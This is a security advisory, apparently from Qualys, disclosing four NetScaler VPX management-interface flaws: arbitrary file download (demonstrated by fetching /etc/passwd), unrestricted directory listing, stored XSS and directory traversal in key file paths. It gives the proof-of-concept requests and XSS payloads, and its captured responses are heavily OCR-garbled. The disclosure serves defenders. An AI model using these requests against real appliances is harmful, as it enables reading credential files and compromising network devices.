Qualys Security Advisory 


Citrix Netscaler Multiple Security Vulnerabilities 


SYSTEMS AFFECTED: Citrix Netscaler VPX series 

SYSTEMS TESTED: 
Citrix NetScaler VPX 1000: Build: NetScaler NS10.5: Build 56.22.nc 
Citrix NetScaler VPX 200: Build: NetScaler NS11.0: Build 68.12.nc 


Reference: https:// www.citrix.com/NetScaler/ 


Note: Exploitation for the below vulnerabilities require access to the Management Interface. 


VULNERABILITY DETAILS: 


CVE-2018-6808: Arbitrary File Download 


NetScaler allows user with permissions to create backup / certificate / key files. The files are stored in 
different directories based on the type of the configuration. Example: SSL Certificates and Keys are stored 
in /nsconfig/ssI/ directory; backup files are stored in /var/ directory etc. A user who has access to 
download similar files can download arbitrary files from the appliance. 


CVSS: AV: N/AC: L/Au: N/C:C/I: N/A: N 


Steps to reproduce: 


1. Navigate to System : Backup tab 

2. Start a proxy and put it on intercept mode to block the requests. 

3. Click on download backup from the available backups 
A valid request is as below 
http://192.168.146.130/rapi/filedownload?filter=path:%2Fvar%2Fns_sys_backup%2Ftest.tgz 


4. Modifying the filter=path value to any other file like passwd or master.pwd, will download that 
file. 


See the below snapshot for reference, which shows the exploitation of the above request to 
download /etc/passwd file. 


Request 


_[ Raw Params | Headers | Hex 


Response 


Ran estos [x 


GET /rapi/filedownload?filter=path: s2Fetc%2Fpasswdérand_key=1349737858. 1492859562876677 


HTTP/1.1 
Host: 192.168.146.130 
User-Agent: Mozilla/5.0 (Windows NT 


Accept-Language: en-US,en;q=0.5 


10.0; WOWE4; rv:52.0) Gecko/20100101 Firefox/52.0 
Accept: text/html, application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 


Referer: http://192.168.146.130/menu/neo 


Cookie: startupapp’ 
rdx_pagination_size= 
DNT: 1 

Connection: close 
Upgrade-Insecure-Requests: 1 


25%20Per%20Page 


eo; is_cisco_platform=0; SESSID=eaf4e576103de422 6ebacfcOc4ledsds; 


HTTP/1.1 200 OK 

Date: Sat, 22 Apr 2017 11:25:12 GMT 

Server: Apache 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 
Cache-Control: 

Pragma: no-cache 

Content-Disposition: attachment; filename="passwd" 
Content-Length: 465 

Connection: close 

Content-Type: text/plain 


:Charlie €:/root:/usr/bin/bash 

Netscaler Root:/root:/netscaler/nssh 

wner of many system processes:/root:/nonexistent 

O:System &:/nonexistent:/nonexistent 

inaries Commands and Source,,,:/:/nonexistent 

65534: 65534: Unprivileged user:/non stent: /nonexistent 

:65533:65533:SSHD User: /nonexistent:/nonexistent 

nsmonitor: *:65532:65534:Netscaler Monitoring user:/var/nstmp/monitors:/nonexistent 


CVE-2018-6809: Improper access restriction to file system access api. 


Netscaler provides NITRO api to access or list the file in a specific directory. This api is called to list files 
in /nsconfig/ssl or /var/ directory. etc. The api does not impose proper restriction on which directories 
should be allowed to be access, which allow a user with “show system file” command permission to 


access any directory present on the appliance. 


CVSS: AV: N/AC: L/Au: S/C:C/I: N/A: N 


Steps to reproduce: 


1. Login with an user account with “show system file” permission and access below request. This will 


list all the directories and files present in “/” directory. 


http://192.168.146.130/nitro/v 1/config/systemfile?args=fileLocation: %2F&pageno=1 &pagesize=10 


0 


Below is the snapshot for the above request output: 


Request 


Raw | Params | Headers | Hex | 


Response 


Raw | Headers | Hex 


GET /nitro/vi/config/systemfile?args=fileLocation: ¥3F spageno=lepagesize=100 HTTP/1.1 


st -130 


User-Agent 


M 


q=0.5 
is_cisco_platform=0; 
$20PEr+20Page 


illa/5.0 (Windows NT 10.0; WOWE4; r 
Accept: text/html, application/xhtml+xml, applicat ion/: 
S 


0100101 Firefox/52.0 


q=0.9, */*;q=0.8 


SESSID=31b4b8d3279ba7e08855ba3962ab433e; 


7 


Apr 2017 20:38:10 GMT 


: Thu, 19 Nov 1981 08:52:00 GĦT 
no-store, no-cache, must-revalidate, post-check=0, pre-check=0 


Connection: close 
Content-Type: application/json; charset=utf-8 


( "errorcode": 0, "message": " 
"\/", "£ileaccesst im 
[ "DIRECTORY" ] }, 
"filemodifiedtime” 
"filelocation": 
2017" 
09:33 
"flash", "\/", "Eileaccesstime 


, "systemfile": [ ( "filename": 
"£1 lemodif iedt im 


", "filelocation": 
, "filemode": 


Tue Apr 18 09:01:3 
"fileaccesstime": "Sat Apr 
"filename" 

Apr 18 
time”: 


"Fri Apr 
emode": [ "DIRECTORY" ] ), ( "filename 
"Sat Apr pS dime”: "Thu Ju; 

"filename oc fileaccesstime" 


": "Sat Apr 22 
"filenam 
"Sat Apr 


IRECTORY" ] }, 
odifiedtime": " 


lemodifiedt ime" 
", "file 
Apr [ "DIRECTORY" 
"fileaccesstime”: "Sat Apr 22 2017", "£ilemodifiedt ime" 
"DIRECTORY" ] }, { "filename": "var", "filelocation": "\/", "fileaccesstime" 
"£ilemodifiedt im 


: mM", "fileaccesst im 


e "€ilemodifiedtime": "Thu Jul 
[ "DIRECTORY" ] ), { ‘ 


ocation": "\/", "fileaccesstim 
, "filemodifiedt ime” ilemode": [ "DIRECTORY" ] }, ( 
"filename": "filelocation": "\/", 1:38:37 2017", "£ilemodifiedt ime": 
"Tue Apr 18 14 2017", "£ilemode": [ "DIRECTORY" ] } ] } 


CVE-2018-6811: Multiple Cross-site Scripting 


NetScaler does not perform html encoding of user input data, which allows a user with permissions to UI 
modifications to add arbitrary payload to the UI parameters. 


CVSS: AV:N/AC:L/Au:S/C:C/I:N/A:N 
Following UI components were found affected for XSS during the assessment conducted. 


1. Host Name 


Not configured 


Host Name, DNS IP Address, and Time Zone 


y N Specify a host name to identify your NetScaler, an IP address for a DNS server to resolve domain names, and the time zone in whic 
= 
— Host Name DNS IP Address Time Zone 
zord ) 192.168.146.1 CoordinatedUniversalTime 
— 
Licenses 
Al Unload licenses from vour lacal camnuter nr allocate licenses fram the Citriv licensinn nortal 
Console © Debugger {} Style Editor (@, Performance Lt Memory = Network 


>» <tr></tr> 
w<tr> 
w <td> 
<div class="global_settings_label global_settings_small_label"“>Host Name</div> 
w<div class="global_settings_field"> 


zorx 
<img src="x" onerror="alert(1)"> e 
</div> O 
</td> 


b <td></td> 


2. Certificate Key Filename and Certificate Filename 


Request 


Response 


[Raw [Params | Headers | Hex Spam [Headers [Hee] 


POST /nitro/vl/config/sslrsakey HTTP/1.1 
Host: 192.168.146.130 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWé6é4; rv:52.0) Gecko/20100101 Firefox/52.0 


Accept: */* 

Accept-Language: en-US,en;q=0.5 

Content-Type: application/x-www-form-urlencoded 
If-Modified-Since: Thu, O1 Jan 1970 05:30:00 GMT 
NITRO_WEB_APPLICATION: true 

cand key: M 

Referer: htt. / 192.168.146. 13U/menu/ neo 


Content 
Cookie ers? 


Authorization: Basic dGVzdDpOZXNO 
Connection: close 


r=350px; 


t={"params":{"action":"create", "warning" :"YES")} ,"sslrsakey":{"keyfile":"res<script>alert |1)", "bit 
"1233", "exponent": "3", "keyform" :"PEM")} } 


HTTP/1.0 201 Created > 

Date: Sat, 22 Apr 2017 08:37:05 GMT 

Server: Apache 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 
Pragma: no-cache 

Content-Length: 57 

Connection: close 

Content-Type: application/json; charset=utf-8 

{ "errorcode": 0, 


"message": "Done", "severity": "NONE" } 


3. Test Root Certificate 


Dashboard Configuration Reporting 


Create and Install Test Certificate 


Certificate File Name* 


thsting_root 


Fully Qualified Domain Name* 


bbbb<script>alert(1) 


Country* 


UNITED STATES 


z | tor | =] Console D Debugger {} StyleEditor (Œ Performance (t Memory = Network 

+ 

<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" “http://www.w3.org/TR/xhtml1/DTD/xhtmli-strict .dtd"> 
<html xmlns="http:// rg/199 tml"> @ 


of 1| © alert| Q|; 


http-equiv 
<meta http-equiv= 


4. OCSP Responder 


Create OCSP Responder 


Create OCSP Responder 


Name* 


test<img src=x onerror=alert(1)> 


URL* 
http://localhosty| @ 
C) Cache 


Time-out 


1 minutes 


Request Batching 
Batching Depth* 
g 


Batching Delay 
1 


Response Verification 


(_) Trust Responses 
Produced At Time Skew 


300 seconds 


Miz 


Certificate 


z 


Request Time-out 


Sianina Certificate 


2000 milliseconds 


CVE-2018-6810: Improper Access Restriction / Directory Traversal 


NetScaler allows a user to create certificate and key file via certification creation wizard. By default, the 
certificates are stored in /nsconfig/ssl/ directory. The request generated to create ssl key and certificate is 
not properly restricted, this allows creating rsa key and certificates outside the intended /nsconfig/ss1 
directory by using directory traversal. 


CVSS: AV: N/AC: L/Au: S/C: N/I: P/A: N 
URL: 
http://192.168.146.130/nitro/v1/config/ssIrsake 


In below snapshot it can be observed that using directory traversal it was possible to create a file in /etc 
directory 


(Gaa ETa) mth Target: http://192.168.146.130 


Request 


Response 
Raw | Params | Headers | Hex | Raw | Headers | Hex | 
‘OS i /ss. y HTTP/1.1 a HTTP/1.0 201 C: ted 
F 3 


NT 10.0; WOW&4; rv:52.0) Gecko/20100101 Firefox/52.0 


ache, must-revalidate, post-check=0, pre-check=0 


orm-ur ed 
Jan 1970 05:30:00 GMT 


g : { 0, ": "NONE" } 
ES"), "ssirsakey": ("keyfile":"./certfolder/../../../.. 


aP 192.168.146.130 - PuTTY 


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Qualys Application Security and 
Research Team (QUASAR). 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to quasar @qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2018 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way 


